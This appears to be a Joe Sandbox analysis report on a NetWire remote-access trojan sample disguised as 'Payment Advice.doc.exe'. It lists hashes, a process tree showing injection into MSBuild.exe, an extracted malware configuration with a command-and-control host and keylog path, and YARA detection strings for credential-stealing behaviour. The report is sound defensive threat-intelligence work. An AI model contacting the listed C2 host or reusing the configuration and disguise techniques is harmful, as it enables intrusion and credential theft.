Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Advice.doc.exe

Overview

General Information

Sample Name:Payment Advice.doc.exe
Analysis ID:624065
MD5:173ecae1209e548d0df71d631494b30d
SHA1:34fbce321e992e5bf88bd1a3c0502dc5679e71a7
SHA256:8a54db382066229c50cc8e6feab1bc532431ee7804e54efceeffd696422e64d4
Tags:exe
Infos:

Detection

NetWire
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected NetWire RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Payment Advice.doc.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\Payment Advice.doc.exe" MD5: 173ECAE1209E548D0DF71D631494B30D)
    • cmd.exe (PID: 7120 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 916 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • MSBuild.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 6940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 3280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • word.exe (PID: 4816 cmdline: "C:\Users\user\AppData\Local\word.exe" MD5: 173ECAE1209E548D0DF71D631494B30D)
    • cmd.exe (PID: 1220 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6012 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • word.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\word.exe" MD5: 173ECAE1209E548D0DF71D631494B30D)
    • cmd.exe (PID: 6464 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6320 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: NetWire

{"C2 list": ["chongmei33.myddns.rocks:49703"], "Password": "Password", "Host ID": "HostId-APRIL", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "%AppData%\\Logs\\"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Payment Advice.doc.exeTypical_Malware_String_TransformsDetects typical strings in a reversed or otherwise modified formFlorian Roth
  • 0x6e86b:$i2: sserddAcorPteG
  • 0x6e87a:$i3: AyrarbiLdaoL

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\word.exeTypical_Malware_String_TransformsDetects typical strings in a reversed or otherwise modified formFlorian Roth
  • 0x6e86b:$i2: sserddAcorPteG
  • 0x6e87a:$i3: AyrarbiLdaoL

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
    0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_NetWireDetects NetWire RATditekSHen
    • 0x2304d:$x1: SOFTWARE\NetWire
    • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
    • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x22f1e:$s2: filenames.txt
    • 0x230c4:$s3: GET %s HTTP/1.1
    • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
    • 0x23072:$s6: -m "%s"
    • 0x23046:$g1: HostId
    • 0x239b0:$g2: History
    • 0x23a10:$g3: encrypted_key
    • 0x23065:$g4: Install Date
    • 0x235fd:$g5: hostname
    • 0x23606:$g6: encryptedUsername
    • 0x23618:$g7: encryptedPassword
    0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
      0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_NetWireDetects NetWire RATditekSHen
      • 0x2304d:$x1: SOFTWARE\NetWire
      • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
      • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      • 0x22f1e:$s2: filenames.txt
      • 0x230c4:$s3: GET %s HTTP/1.1
      • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
      • 0x23072:$s6: -m "%s"
      • 0x23046:$g1: HostId
      • 0x239b0:$g2: History
      • 0x23a10:$g3: encrypted_key
      • 0x23065:$g4: Install Date
      • 0x235fd:$g5: hostname
      • 0x23606:$g6: encryptedUsername
      • 0x23618:$g7: encryptedPassword
      0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        28.0.MSBuild.exe.400000.3.raw.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
          28.0.MSBuild.exe.400000.3.raw.unpackMALWARE_Win_NetWireDetects NetWire RATditekSHen
          • 0x2304d:$x1: SOFTWARE\NetWire
          • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
          • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          • 0x22f1e:$s2: filenames.txt
          • 0x230c4:$s3: GET %s HTTP/1.1
          • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
          • 0x23072:$s6: -m "%s"
          • 0x23046:$g1: HostId
          • 0x239b0:$g2: History
          • 0x23a10:$g3: encrypted_key
          • 0x23065:$g4: Install Date
          • 0x235fd:$g5: hostname
          • 0x23606:$g6: encryptedUsername
          • 0x23618:$g7: encryptedPassword
          28.0.MSBuild.exe.400000.7.raw.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
            28.0.MSBuild.exe.400000.7.raw.unpackMALWARE_Win_NetWireDetects NetWire RATditekSHen
            • 0x2304d:$x1: SOFTWARE\NetWire
            • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
            • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            • 0x22f1e:$s2: filenames.txt
            • 0x230c4:$s3: GET %s HTTP/1.1
            • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
            • 0x23072:$s6: -m "%s"
            • 0x23046:$g1: HostId
            • 0x239b0:$g2: History
            • 0x23a10:$g3: encrypted_key
            • 0x23065:$g4: Install Date
            • 0x235fd:$g5: hostname
            • 0x23606:$g6: encryptedUsername
            • 0x23618:$g7: encryptedPassword
            28.0.MSBuild.exe.400000.2.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
              Click to see the 41 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 28.0.MSBuild.exe.400000.3.unpackMalware Configuration Extractor: NetWire {"C2 list": ["chongmei33.myddns.rocks:49703"], "Password": "Password", "Host ID": "HostId-APRIL", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "%AppData%\\Logs\\"}
              Multi AV Scanner detection for submitted file
              Source: Payment Advice.doc.exeReversingLabs: Detection: 41%
              Antivirus / Scanner detection for submitted sample
              Source: Payment Advice.doc.exeAvira: detected
              Antivirus detection for URL or domain
              Source: chongmei33.myddns.rocks:49703Avira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: chongmei33.myddns.rocksVirustotal: Detection: 7%Perma Link
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\word.exeAvira: detection malicious, Label: HEUR/AGEN.1232117
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\word.exeReversingLabs: Detection: 41%
              Machine Learning detection for sample
              Source: Payment Advice.doc.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\word.exeJoe Sandbox ML: detected
              Source: 28.0.MSBuild.exe.400000.3.unpackAvira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.7.unpackAvira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.4.unpackAvira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.6.unpackAvira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.5.unpackAvira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
              Source: 28.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.1.unpackAvira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.2.unpackAvira: Label: TR/Spy.Gen
              Source: Payment Advice.doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
              Source: Payment Advice.doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: chongmei33.myddns.rocks:49703
              Source: Joe Sandbox ViewASN Name: M247GB M247GB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.143
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.143
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: MSBuild.exeString found in binary or memory: http://www.yandex.com
              Source: MSBuild.exe, 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.yandex.comsocks=
              Source: word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
              Source: unknownDNS traffic detected: queries for: chongmei33.myddns.rocks
              Source: word.exe, 00000013.00000002.521532861.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: MSBuild.exe, 0000001C.00000002.517001932.000000000042B000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: GetRawInputData

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 28.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 19.2.word.exe.8000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 20.2.word.exe.4650c70.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 19.2.word.exe.8000000.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 20.2.word.exe.8130000.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 20.2.word.exe.8130000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 19.2.word.exe.4540c70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 20.2.word.exe.4650c70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 19.2.word.exe.4540c70.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NetWire RAT Author: ditekSHen
              Source: 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: Payment Advice.doc.exe
              Source: Payment Advice.doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
              Source: Payment Advice.doc.exe, type: SAMPLEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 28.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 19.0.word.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 28.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 20.0.word.exe.390000.0.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 20.2.word.exe.390000.0.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 19.2.word.exe.8000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.4650c70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.8000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.8130000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.8130000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.4540c70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.4650c70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.4540c70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 0.0.Payment Advice.doc.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 0.2.Payment Advice.doc.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
